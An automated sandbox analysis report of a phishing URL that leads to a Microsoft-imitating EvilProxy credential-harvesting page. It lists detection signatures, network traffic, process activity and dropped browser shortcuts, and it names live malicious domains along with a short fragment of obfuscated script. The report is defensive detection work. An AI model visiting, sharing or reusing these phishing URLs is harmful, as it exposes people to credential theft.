Edit tour

Windows Analysis Report
http://1lyiqb.recodifyphone.net/#john.smith@ups.com

Overview

General Information

Sample URL:	http://1lyiqb.recodifyphone.net/#john.smith@ups.com
Analysis ID:	1545406

Detection

EvilProxy, HTMLPhisher

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Evil Proxy Phishing kit

Yara detected HtmlPhish10

AI detected landing page (webpage, office document or email)

AI detected suspicious URL

HTML page contains obfuscated javascript

Phishing site detected (based on image similarity)

HTML body contains low number of good links

HTML title does not match URL

Invalid T&C link found

Stores files to the Windows start menu directory

URL contains potential PII (phishing indication)

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 2960 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1784,i,620905324616366912,13668513917804224046,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

chrome.exe (PID: 2560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://1lyiqb.recodifyphone.net/#john.smith@ups.com" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.3.id.script.csv	JoeSecurity_EvilProxy	Yara detected Evil Proxy Phishing kit	Joe Security
2.1.pages.csv	JoeSecurity_EvilProxy	Yara detected Evil Proxy Phishing kit	Joe Security
2.1.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected Evil Proxy Phishing kit

Source: Yara match	File source: 0.3.id.script.csv, type: HTML
Source: Yara match	File source: 2.1.pages.csv, type: HTML

Yara detected HtmlPhish10

Source: Yara match

File source: 2.1.pages.csv, type: HTML

HTML page contains obfuscated javascript

Source: https://spos3cu7ia.mutienuial.shop/?email=john.smith@ups.com

HTTP Parser: var _0x17d0bb=_0x4400;function _0x4400(_0x33d568,_0x56aee1){var _0x28f930=_0x1e42();return _0x4

Phishing site detected (based on image similarity)

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm

Matcher: Found strong image similarity, brand: MICROSOFT

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm

HTTP Parser: Number of links: 0

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm

HTTP Parser: Title: PQ3WOU2JKYIXH9LB7A61 does not match URL

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm	HTTP Parser: Invalid link: Terms of use
Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm	HTTP Parser: Invalid link: Privacy & cookies

Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com
Source: http://1lyiqb.recodifyphone.net/#john.smith@ups.com	Sample URL: PII: john.smith@ups.com

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm

HTTP Parser: No <meta name="author".. found

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.18:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.18:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.72:443 -> 192.168.2.18:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.150:443 -> 192.168.2.18:49732 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 21MB later: 30MB

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.32.72

Source: global traffic	DNS traffic detected: DNS query: 1lyiqb.recodifyphone.net
Source: global traffic	DNS traffic detected: DNS query: spos3cu7ia.mutienuial.shop
Source: global traffic	DNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.18:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.18:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.72:443 -> 192.168.2.18:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.150:443 -> 192.168.2.18:49732 version: TLS 1.2

Source: classification engine

Classification label: mal72.phis.win@19/15@14/137

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1784,i,620905324616366912,13668513917804224046,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://1lyiqb.recodifyphone.net/#john.smith@ups.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1784,i,620905324616366912,13668513917804224046,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Persistence and Installation Behavior

AI detected landing page (webpage, office document or email)

Source: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm

LLM: Page contains button: 'Sign-in options' Source: '2.1.pages.csv'

AI detected suspicious URL

Source: Email

JoeBoxAI: AI detected Typosquatting in URL: URL: https://spos3cu7ia.mutienuial.shop

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Extra Window Memory Injection	1 Extra Window Memory Injection	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	216.58.206.36	true	false	unknown
1lyiqb.recodifyphone.net	172.67.134.198	true	false	unknown
spos3cu7ia.mutienuial.shop	209.74.95.101	true	true	unknown
cdn.jsdelivr.net	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://spos3cu7ia.mutienuial.shop/?email=john.smith@ups.com	true		unknown
https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm	true		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
104.18.186.31	unknown	United States	13335	CLOUDFLARENETUS	false
104.18.187.31	unknown	United States	13335	CLOUDFLARENETUS	false
209.74.95.101	spos3cu7ia.mutienuial.shop	United States	31744	MULTIBAND-NEWHOPEUS	true
172.217.16.206	unknown	United States	15169	GOOGLEUS	false
142.250.186.163	unknown	United States	15169	GOOGLEUS	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
142.251.173.84	unknown	United States	15169	GOOGLEUS	false
104.21.25.216	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.185.142	unknown	United States	15169	GOOGLEUS	false
142.250.186.99	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.18

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545406
Start date and time:	2024-10-30 14:18:44 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	http://1lyiqb.recodifyphone.net/#john.smith@ups.com
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.phis.win@19/15@14/137

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 142.250.186.163, 172.217.16.206, 142.251.173.84, 34.104.35.123
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, clientservices.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
Not all processes where analyzed, report is missing behavior information
VT rate limit hit for: http://1lyiqb.recodifyphone.net/#john.smith@ups.com

LLM Input / Output

Input	Output
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: URL: http://1lyiqb.recodifyphone.net
URL: Model: claude-3-5-sonnet-latest	{ "typosquatting": true, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: URL: https://spos3cu7ia.mutienuial.shop
URL: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm Model: claude-3-haiku-20240307	```json { "contains_trigger_text": true, "trigger_text": "Trying to sign you in", "prominent_button_name": "Sign-in options", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false }

URL: https://spos3cu7ia.mutienuial.shop/m/053c26d7040469b2dc0a5fbfa0eaa032.htm Model: claude-3-haiku-20240307	```json { "brands": [ "Microsoft" ] }
	```json { "brands": [ "Microsoft" ] }

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:19:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	3.9710883141026248
Encrypted:	false
SSDEEP:
MD5:	05E5023A5791E2104C2397C66E1884BF
SHA1:	5688448F86C0BBDE9D532A7D0747479E15EE8685
SHA-256:	20124A22D4BA28ED3483E071B8E851272C9235186F6920091DCAF62B9D886A9A
SHA-512:	3B7B5FDD602C008DB604D6906A3FAD4A200230A865A928A81A8E8ADAA6F39CF8C1B9991968A0D5DD3C7A3644489F8AD1D31A1321FE18A6F63CE2D44F6D8ACAB3
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......U.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I^Y]j....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Yjj....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V^Yjj....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V^Yjj...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Ylj.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 30 12:19:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988369580991157
Encrypted:	false
SSDEEP:
MD5:	951F322145F844CABC877A4EFB9805E0
SHA1:	0423CAFF664AA155FE85BFA5D3A6965E300D7DC9
SHA-256:	7186B1A76D8DF33CF055A660C284CB3F5BC3AD0B5F066763E47AB02732882497
SHA-512:	EB741224090B1C4F77F0F580E86D02A2006FB4E61C93F23B3A7AB92FC8C95BBE2D2358D52F25AED6011314E924E823B801594CBE57683E67BA440C7A4ACCFFDE
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....9.U.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.I^Y]j....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V^Yjj....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.V^Yjj....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.V^Yjj...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V^Ylj.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............2>.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2691
Entropy (8bit):	4.000130002729305
Encrypted:	false
SSDEEP:
MD5:	3654B7C4EC4E550B3ABC43673FC8FA3A
SHA1:	8B24FED6229255AF0CB86D001C235371F189A6CB
SHA-256:	070E1ACF49F8BFDE8EF339332282B0CE2256797878A4A396506C35C2AFFC6D11
SHA-512:	D12433F09B71E1906B60B219DFB8FDDC3318D5105DC0BF314B129706F5E5C6A8012FD9083B45B29823F86EF55D98CDEB3DA7E17FFB696D39489684B85DE7285D
Malicious:	false
Reputation:	unknown
